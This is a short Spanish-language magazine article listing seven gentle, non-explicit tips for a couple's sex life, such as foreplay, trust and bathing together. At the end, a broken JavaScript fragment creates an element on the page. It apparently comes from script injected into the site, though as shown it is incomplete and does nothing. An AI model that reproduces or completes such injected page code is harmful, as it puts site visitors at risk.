7 Tips que mejorarán tu vida sexual

Por Elizabeth Palacios       @ely__palacios

Por más bueno que seas en la cama, nunca están de más algunos tips para mejorar tu vida sexual.

 

Es por ello que en WTF Online te daremos 7 tips para mejorar tu sexualidad en pareja:

Juegos preliminares

Los preliminares son importantísimos, todo cuenta, la luz, los olores, las texturas, las caricias, los besos.

Las palabras adecuadas

Las palabras pueden ayudar a la excitación, con el tiempo, la pareja aprende qué tipo de frases, palabras o comentarios son los que le prenden a la otra persona, aplícalas en el momento preciso.

Escucha

Los gemidos son señales que debes tener muy en cuenta, la respiración agitada y las peticiones de tu pareja, te ayudarán a poner énfasis en ciertas zonas y ciertos momentos.

Acaricia

Tómate tu tiempo para acariciar cada rincón del cuerpo de tu pareja, hazlo con cremas, aceites o como lo desees, pero hazlo, esto te ayudará a descubrir las zonas más excitantes de ella.

Confianza

Confiar en tu pareja y que tu pareja confíe ciegamente en ti, les permitirá experimentar cuanta fantasía les cruce por la mente sin temor a prejuicios o ser lastimados.

Relax

Tomarte el tiempo suficiente para tener relaciones sexuales es muy importante, poder tener tiempo de calidad con tu pareja es elemental para una buena experiencia sexual, dedicarle atención a la ambientación, a darle un masaje a tu pareja, cada detalle cuenta.

Baño en pareja

Bañarse en pareja les ayudará a tener un momento previo al encuentro sexual, tanto así que puede que no aguanten las ganas y tengan relaciones en la misma ducha, disfruten de la humedad, el calor, la desnudez.

var d=document;var s=d.createElement(”);

Etiquetas:|